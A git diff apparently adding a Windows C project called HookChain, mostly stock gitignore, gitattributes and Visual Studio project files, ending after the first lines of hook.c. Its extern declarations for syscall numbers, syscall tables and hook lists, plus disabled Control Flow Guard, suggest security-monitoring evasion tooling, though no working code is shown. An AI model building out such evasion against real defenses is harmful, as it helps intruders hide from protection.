diff --git a/.gitattributes b/.gitattributes
new file mode 100644
index 0000000..1ff0c42
--- /dev/null
+++ b/.gitattributes
@@ -0,0 +1,63 @@
+###############################################################################
+# Set default behavior to automatically normalize line endings.
+###############################################################################
+* text=auto
+
+###############################################################################
+# Set default behavior for command prompt diff.
+#
+# This is need for earlier builds of msysgit that does not have it on by
+# default for csharp files.
+# Note: This is only used by command line
+###############################################################################
+#*.cs     diff=csharp
+
+###############################################################################
+# Set the merge driver for project and solution files
+#
+# Merging from the command prompt will add diff markers to the files if there
+# are conflicts (Merging from VS is not affected by the settings below, in VS
+# the diff markers are never inserted). Diff markers may cause the following 
+# file extensions to fail to load in VS. An alternative would be to treat
+# these files as binary and thus will always conflict and require user
+# intervention with every merge. To do so, just uncomment the entries below
+###############################################################################
+#*.sln       merge=binary
+#*.csproj    merge=binary
+#*.vbproj    merge=binary
+#*.vcxproj   merge=binary
+#*.vcproj    merge=binary
+#*.dbproj    merge=binary
+#*.fsproj    merge=binary
+#*.lsproj    merge=binary
+#*.wixproj   merge=binary
+#*.modelproj merge=binary
+#*.sqlproj   merge=binary
+#*.wwaproj   merge=binary
+
+###############################################################################
+# behavior for image files
+#
+# image files are treated as binary by default.
+###############################################################################
+#*.jpg   binary
+#*.png   binary
+#*.gif   binary
+
+###############################################################################
+# diff behavior for common document formats
+# 
+# Convert binary document formats to text before diffing them. This feature
+# is only available from the command line. Turn it on by uncommenting the 
+# entries below.
+###############################################################################
+#*.doc   diff=astextplain
+#*.DOC   diff=astextplain
+#*.docx  diff=astextplain
+#*.DOCX  diff=astextplain
+#*.dot   diff=astextplain
+#*.DOT   diff=astextplain
+#*.pdf   diff=astextplain
+#*.PDF   diff=astextplain
+#*.rtf   diff=astextplain
+#*.RTF   diff=astextplain
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..4af530a
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,365 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+##
+## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
+
+# User-specific files
+*.rsuser
+*.suo
+*.user
+*.userosscache
+*.sln.docstates
+.DS_Store
+**/.DS_Store
+
+# User-specific files (MonoDevelop/Xamarin Studio)
+*.userprefs
+
+# Mono auto generated files
+mono_crash.*
+
+# Build results
+[Dd]ebug/
+[Dd]ebugPublic/
+[Rr]elease/
+[Rr]eleases/
+x64/
+x86/
+[Ww][Ii][Nn]32/
+[Aa][Rr][Mm]/
+[Aa][Rr][Mm]64/
+bld/
+[Bb]in/
+[Oo]bj/
+[Oo]ut/
+[Ll]og/
+[Ll]ogs/
+
+# Visual Studio 2015/2017 cache/options directory
+.vs/
+# Uncomment if you have tasks that create the project's static files in wwwroot
+#wwwroot/
+
+# Visual Studio 2017 auto generated files
+Generated\ Files/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+# NUnit
+*.VisualState.xml
+TestResult.xml
+nunit-*.xml
+
+# Build Results of an ATL Project
+[Dd]ebugPS/
+[Rr]eleasePS/
+dlldata.c
+
+# Benchmark Results
+BenchmarkDotNet.Artifacts/
+
+# .NET Core
+project.lock.json
+project.fragment.lock.json
+artifacts/
+
+# ASP.NET Scaffolding
+ScaffoldingReadMe.txt
+
+# StyleCop
+StyleCopReport.xml
+
+# Files built by Visual Studio
+*_i.c
+*_p.c
+*_h.h
+*.ilk
+*.meta
+*.obj
+*.iobj
+*.pch
+*.pdb
+*.ipdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*_wpftmp.csproj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.svclog
+*.scc
+
+# Chutzpah Test files
+_Chutzpah*
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opendb
+*.opensdf
+*.sdf
+*.cachefile
+*.VC.db
+*.VC.VC.opendb
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+*.sap
+
+# Visual Studio Trace Files
+*.e2e
+
+# TFS 2012 Local Workspace
+$tf/
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+*.DotSettings.user
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# AxoCover is a Code Coverage Tool
+.axoCover/*
+!.axoCover/settings.json
+
+# Coverlet is a free, cross platform Code Coverage Tool
+coverage*.json
+coverage*.xml
+coverage*.info
+
+# Visual Studio code coverage results
+*.coverage
+*.coveragexml
+
+# NCrunch
+_NCrunch_*
+.*crunch*.local.xml
+nCrunchTemp_*
+
+# MightyMoose
+*.mm.*
+AutoTest.Net/
+
+# Web workbench (sass)
+.sass-cache/
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.[Pp]ublish.xml
+*.azurePubxml
+# Note: Comment the next line if you want to checkin your web deploy settings,
+# but database connection strings (with potential passwords) will be unencrypted
+*.pubxml
+*.publishproj
+
+# Microsoft Azure Web App publish settings. Comment the next line if you want to
+# checkin your Azure Web App publish settings, but sensitive information contained
+# in these scripts will be unencrypted
+PublishScripts/
+
+# NuGet Packages
+*.nupkg
+# NuGet Symbol Packages
+*.snupkg
+# The packages folder can be ignored because of Package Restore
+**/[Pp]ackages/*
+# except build/, which is used as an MSBuild target.
+!**/[Pp]ackages/build/
+# Uncomment if necessary however generally it will be regenerated when needed
+#!**/[Pp]ackages/repositories.config
+# NuGet v3's project.json files produces more ignorable files
+*.nuget.props
+*.nuget.targets
+
+# Microsoft Azure Build Output
+csx/
+*.build.csdef
+
+# Microsoft Azure Emulator
+ecf/
+rcf/
+
+# Windows Store app package directories and files
+AppPackages/
+BundleArtifacts/
+Package.StoreAssociation.xml
+_pkginfo.txt
+*.appx
+*.appxbundle
+*.appxupload
+
+# Visual Studio cache files
+# files ending in .cache can be ignored
+*.[Cc]ache
+# but keep track of directories ending in .cache
+!?*.[Cc]ache/
+
+# Others
+ClientBin/
+~$*
+*~
+*.dbmdl
+*.dbproj.schemaview
+*.jfm
+*.pfx
+*.publishsettings
+orleans.codegen.cs
+
+# Including strong name files can present a security risk
+# (https://github.com/github/gitignore/pull/2483#issue-259490424)
+#*.snk
+
+# Since there are multiple workflows, uncomment next line to ignore bower_components
+# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
+#bower_components/
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file
+# to a newer Visual Studio version. Backup files are not needed,
+# because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+ServiceFabricBackup/
+*.rptproj.bak
+
+# SQL Server files
+*.mdf
+*.ldf
+*.ndf
+
+# Business Intelligence projects
+*.rdl.data
+*.bim.layout
+*.bim_*.settings
+*.rptproj.rsuser
+*- [Bb]ackup.rdl
+*- [Bb]ackup ([0-9]).rdl
+*- [Bb]ackup ([0-9][0-9]).rdl
+
+# Microsoft Fakes
+FakesAssemblies/
+
+# GhostDoc plugin setting file
+*.GhostDoc.xml
+
+# Node.js Tools for Visual Studio
+.ntvs_analysis.dat
+node_modules/
+
+# Visual Studio 6 build log
+*.plg
+
+# Visual Studio 6 workspace options file
+*.opt
+
+# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
+*.vbw
+
+# Visual Studio LightSwitch build output
+**/*.HTMLClient/GeneratedArtifacts
+**/*.DesktopClient/GeneratedArtifacts
+**/*.DesktopClient/ModelManifest.xml
+**/*.Server/GeneratedArtifacts
+**/*.Server/ModelManifest.xml
+_Pvt_Extensions
+
+# Paket dependency manager
+.paket/paket.exe
+paket-files/
+
+# FAKE - F# Make
+.fake/
+
+# CodeRush personal settings
+.cr/personal
+
+# Python Tools for Visual Studio (PTVS)
+__pycache__/
+*.pyc
+
+# Cake - Uncomment if you are using it
+# tools/**
+# !tools/packages.config
+
+# Tabs Studio
+*.tss
+
+# Telerik's JustMock configuration file
+*.jmconfig
+
+# BizTalk build output
+*.btp.cs
+*.btm.cs
+*.odx.cs
+*.xsd.cs
+
+# OpenCover UI analysis results
+OpenCover/
+
+# Azure Stream Analytics local run output
+ASALocalRun/
+
+# MSBuild Binary and Structured Log
+*.binlog
+
+# NVidia Nsight GPU debugger configuration file
+*.nvuser
+
+# MFractors (Xamarin productivity tool) working folder
+.mfractor/
+
+# Local History for Visual Studio
+.localhistory/
+
+# BeatPulse healthcheck temp database
+healthchecksdb
+
+# Backup folder for Package Reference Convert tool in Visual Studio 2017
+MigrationBackup/
+
+# Ionide (cross platform F# VS Code tools) working folder
+.ionide/
+
+# Fody - auto-generated XML schema
+FodyWeavers.xsd
\ No newline at end of file
diff --git a/HookChain/.gitattributes b/HookChain/.gitattributes
new file mode 100644
index 0000000..1ff0c42
--- /dev/null
+++ b/HookChain/.gitattributes
@@ -0,0 +1,63 @@
+###############################################################################
+# Set default behavior to automatically normalize line endings.
+###############################################################################
+* text=auto
+
+###############################################################################
+# Set default behavior for command prompt diff.
+#
+# This is need for earlier builds of msysgit that does not have it on by
+# default for csharp files.
+# Note: This is only used by command line
+###############################################################################
+#*.cs     diff=csharp
+
+###############################################################################
+# Set the merge driver for project and solution files
+#
+# Merging from the command prompt will add diff markers to the files if there
+# are conflicts (Merging from VS is not affected by the settings below, in VS
+# the diff markers are never inserted). Diff markers may cause the following 
+# file extensions to fail to load in VS. An alternative would be to treat
+# these files as binary and thus will always conflict and require user
+# intervention with every merge. To do so, just uncomment the entries below
+###############################################################################
+#*.sln       merge=binary
+#*.csproj    merge=binary
+#*.vbproj    merge=binary
+#*.vcxproj   merge=binary
+#*.vcproj    merge=binary
+#*.dbproj    merge=binary
+#*.fsproj    merge=binary
+#*.lsproj    merge=binary
+#*.wixproj   merge=binary
+#*.modelproj merge=binary
+#*.sqlproj   merge=binary
+#*.wwaproj   merge=binary
+
+###############################################################################
+# behavior for image files
+#
+# image files are treated as binary by default.
+###############################################################################
+#*.jpg   binary
+#*.png   binary
+#*.gif   binary
+
+###############################################################################
+# diff behavior for common document formats
+# 
+# Convert binary document formats to text before diffing them. This feature
+# is only available from the command line. Turn it on by uncommenting the 
+# entries below.
+###############################################################################
+#*.doc   diff=astextplain
+#*.DOC   diff=astextplain
+#*.docx  diff=astextplain
+#*.DOCX  diff=astextplain
+#*.dot   diff=astextplain
+#*.DOT   diff=astextplain
+#*.pdf   diff=astextplain
+#*.PDF   diff=astextplain
+#*.rtf   diff=astextplain
+#*.RTF   diff=astextplain
diff --git a/HookChain/.gitignore b/HookChain/.gitignore
new file mode 100644
index 0000000..4af530a
--- /dev/null
+++ b/HookChain/.gitignore
@@ -0,0 +1,365 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+##
+## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
+
+# User-specific files
+*.rsuser
+*.suo
+*.user
+*.userosscache
+*.sln.docstates
+.DS_Store
+**/.DS_Store
+
+# User-specific files (MonoDevelop/Xamarin Studio)
+*.userprefs
+
+# Mono auto generated files
+mono_crash.*
+
+# Build results
+[Dd]ebug/
+[Dd]ebugPublic/
+[Rr]elease/
+[Rr]eleases/
+x64/
+x86/
+[Ww][Ii][Nn]32/
+[Aa][Rr][Mm]/
+[Aa][Rr][Mm]64/
+bld/
+[Bb]in/
+[Oo]bj/
+[Oo]ut/
+[Ll]og/
+[Ll]ogs/
+
+# Visual Studio 2015/2017 cache/options directory
+.vs/
+# Uncomment if you have tasks that create the project's static files in wwwroot
+#wwwroot/
+
+# Visual Studio 2017 auto generated files
+Generated\ Files/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+# NUnit
+*.VisualState.xml
+TestResult.xml
+nunit-*.xml
+
+# Build Results of an ATL Project
+[Dd]ebugPS/
+[Rr]eleasePS/
+dlldata.c
+
+# Benchmark Results
+BenchmarkDotNet.Artifacts/
+
+# .NET Core
+project.lock.json
+project.fragment.lock.json
+artifacts/
+
+# ASP.NET Scaffolding
+ScaffoldingReadMe.txt
+
+# StyleCop
+StyleCopReport.xml
+
+# Files built by Visual Studio
+*_i.c
+*_p.c
+*_h.h
+*.ilk
+*.meta
+*.obj
+*.iobj
+*.pch
+*.pdb
+*.ipdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*_wpftmp.csproj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.svclog
+*.scc
+
+# Chutzpah Test files
+_Chutzpah*
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opendb
+*.opensdf
+*.sdf
+*.cachefile
+*.VC.db
+*.VC.VC.opendb
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+*.sap
+
+# Visual Studio Trace Files
+*.e2e
+
+# TFS 2012 Local Workspace
+$tf/
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+*.DotSettings.user
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# AxoCover is a Code Coverage Tool
+.axoCover/*
+!.axoCover/settings.json
+
+# Coverlet is a free, cross platform Code Coverage Tool
+coverage*.json
+coverage*.xml
+coverage*.info
+
+# Visual Studio code coverage results
+*.coverage
+*.coveragexml
+
+# NCrunch
+_NCrunch_*
+.*crunch*.local.xml
+nCrunchTemp_*
+
+# MightyMoose
+*.mm.*
+AutoTest.Net/
+
+# Web workbench (sass)
+.sass-cache/
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.[Pp]ublish.xml
+*.azurePubxml
+# Note: Comment the next line if you want to checkin your web deploy settings,
+# but database connection strings (with potential passwords) will be unencrypted
+*.pubxml
+*.publishproj
+
+# Microsoft Azure Web App publish settings. Comment the next line if you want to
+# checkin your Azure Web App publish settings, but sensitive information contained
+# in these scripts will be unencrypted
+PublishScripts/
+
+# NuGet Packages
+*.nupkg
+# NuGet Symbol Packages
+*.snupkg
+# The packages folder can be ignored because of Package Restore
+**/[Pp]ackages/*
+# except build/, which is used as an MSBuild target.
+!**/[Pp]ackages/build/
+# Uncomment if necessary however generally it will be regenerated when needed
+#!**/[Pp]ackages/repositories.config
+# NuGet v3's project.json files produces more ignorable files
+*.nuget.props
+*.nuget.targets
+
+# Microsoft Azure Build Output
+csx/
+*.build.csdef
+
+# Microsoft Azure Emulator
+ecf/
+rcf/
+
+# Windows Store app package directories and files
+AppPackages/
+BundleArtifacts/
+Package.StoreAssociation.xml
+_pkginfo.txt
+*.appx
+*.appxbundle
+*.appxupload
+
+# Visual Studio cache files
+# files ending in .cache can be ignored
+*.[Cc]ache
+# but keep track of directories ending in .cache
+!?*.[Cc]ache/
+
+# Others
+ClientBin/
+~$*
+*~
+*.dbmdl
+*.dbproj.schemaview
+*.jfm
+*.pfx
+*.publishsettings
+orleans.codegen.cs
+
+# Including strong name files can present a security risk
+# (https://github.com/github/gitignore/pull/2483#issue-259490424)
+#*.snk
+
+# Since there are multiple workflows, uncomment next line to ignore bower_components
+# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
+#bower_components/
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file
+# to a newer Visual Studio version. Backup files are not needed,
+# because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+ServiceFabricBackup/
+*.rptproj.bak
+
+# SQL Server files
+*.mdf
+*.ldf
+*.ndf
+
+# Business Intelligence projects
+*.rdl.data
+*.bim.layout
+*.bim_*.settings
+*.rptproj.rsuser
+*- [Bb]ackup.rdl
+*- [Bb]ackup ([0-9]).rdl
+*- [Bb]ackup ([0-9][0-9]).rdl
+
+# Microsoft Fakes
+FakesAssemblies/
+
+# GhostDoc plugin setting file
+*.GhostDoc.xml
+
+# Node.js Tools for Visual Studio
+.ntvs_analysis.dat
+node_modules/
+
+# Visual Studio 6 build log
+*.plg
+
+# Visual Studio 6 workspace options file
+*.opt
+
+# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
+*.vbw
+
+# Visual Studio LightSwitch build output
+**/*.HTMLClient/GeneratedArtifacts
+**/*.DesktopClient/GeneratedArtifacts
+**/*.DesktopClient/ModelManifest.xml
+**/*.Server/GeneratedArtifacts
+**/*.Server/ModelManifest.xml
+_Pvt_Extensions
+
+# Paket dependency manager
+.paket/paket.exe
+paket-files/
+
+# FAKE - F# Make
+.fake/
+
+# CodeRush personal settings
+.cr/personal
+
+# Python Tools for Visual Studio (PTVS)
+__pycache__/
+*.pyc
+
+# Cake - Uncomment if you are using it
+# tools/**
+# !tools/packages.config
+
+# Tabs Studio
+*.tss
+
+# Telerik's JustMock configuration file
+*.jmconfig
+
+# BizTalk build output
+*.btp.cs
+*.btm.cs
+*.odx.cs
+*.xsd.cs
+
+# OpenCover UI analysis results
+OpenCover/
+
+# Azure Stream Analytics local run output
+ASALocalRun/
+
+# MSBuild Binary and Structured Log
+*.binlog
+
+# NVidia Nsight GPU debugger configuration file
+*.nvuser
+
+# MFractors (Xamarin productivity tool) working folder
+.mfractor/
+
+# Local History for Visual Studio
+.localhistory/
+
+# BeatPulse healthcheck temp database
+healthchecksdb
+
+# Backup folder for Package Reference Convert tool in Visual Studio 2017
+MigrationBackup/
+
+# Ionide (cross platform F# VS Code tools) working folder
+.ionide/
+
+# Fody - auto-generated XML schema
+FodyWeavers.xsd
\ No newline at end of file
diff --git a/HookChain/HookChain/HookChain.vcxproj b/HookChain/HookChain/HookChain.vcxproj
new file mode 100644
index 0000000..4d00bb8
--- /dev/null
+++ b/HookChain/HookChain/HookChain.vcxproj
@@ -0,0 +1,154 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>17.0</VCProjectVersion>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectGuid>{b0c08c11-23c4-495f-b40b-14066f12faab}</ProjectGuid>
+    <RootNamespace>HookChain</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0.18362.0</WindowsTargetPlatformVersion>
+    <ProjectName>HookChain_msg</ProjectName>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+    <UseOfMfc>Static</UseOfMfc>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <Optimization>Disabled</Optimization>
+      <CompileAs>CompileAsC</CompileAs>
+      <ExceptionHandling>false</ExceptionHandling>
+      <ControlFlowGuard>false</ControlFlowGuard>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClInclude Include="hook.h" />
+    <ClInclude Include="windows_common.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="hook.c" />
+    <ClCompile Include="main.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <MASM Include="hookchain.asm">
+      <FileType>Document</FileType>
+      <GenerateDebugInformation Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</GenerateDebugInformation>
+    </MASM>
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/HookChain/HookChain/HookChain.vcxproj.filters b/HookChain/HookChain/HookChain.vcxproj.filters
new file mode 100644
index 0000000..afe2b31
--- /dev/null
+++ b/HookChain/HookChain/HookChain.vcxproj.filters
@@ -0,0 +1,41 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+    <Filter Include="ASM Files">
+      <UniqueIdentifier>{0339378c-afc2-4b49-aa64-16cc34be8a8f}</UniqueIdentifier>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="hook.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="windows_common.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="hook.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="main.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <MASM Include="hookchain.asm">
+      <Filter>ASM Files</Filter>
+    </MASM>
+  </ItemGroup>
+</Project>
\ No newline at end of file
diff --git a/HookChain/HookChain/gate.c b/HookChain/HookChain/gate.c
new file mode 100644
index 0000000..4ee96c7
--- /dev/null
+++ b/HookChain/HookChain/gate.c
@@ -0,0 +1,4 @@
+#pragma once
+
+#include "gate.h"
+#include <Windows.h>
diff --git a/HookChain/HookChain/gate.h b/HookChain/HookChain/gate.h
new file mode 100644
index 0000000..e69de29
diff --git a/HookChain/HookChain/hook.c b/HookChain/HookChain/hook.c
new file mode 100644
index 0000000..a0d6c30
--- /dev/null
+++ b/HookChain/HookChain/hook.c
@@ -0,0 +1,1130 @@
+#pragma once
+
+#include "hook.h"
+
+#include <Windows.h>
+#include <stdio.h>
+
+static SYSCALL_LIST SyscallList;
+static SYSCALL_LIST HookList;
+static MODULE_LIST ModList;
+static FARPROC ntdllBase;
+static FARPROC kernel32Base;
+static FARPROC kernelbaseBase;
+
+extern BOOLEAN SetTableAddr(PVOID pSyscallTable);
+extern BOOLEAN SetIdx(DWORD functionIndex, DWORD listIndex);
+extern BOOLEAN GetData(PDWORD* dwSSN, PVOID* pSyscallRet);
+extern VOID SetDebug(BOOLEAN enabled);
+extern VOID SetAddr(PVOID* pAddr);
+extern VOID ExecAddr(_In_ HANDLE hProcess, _In_ LPCSTR imageName, _In_ BOOLEAN force);
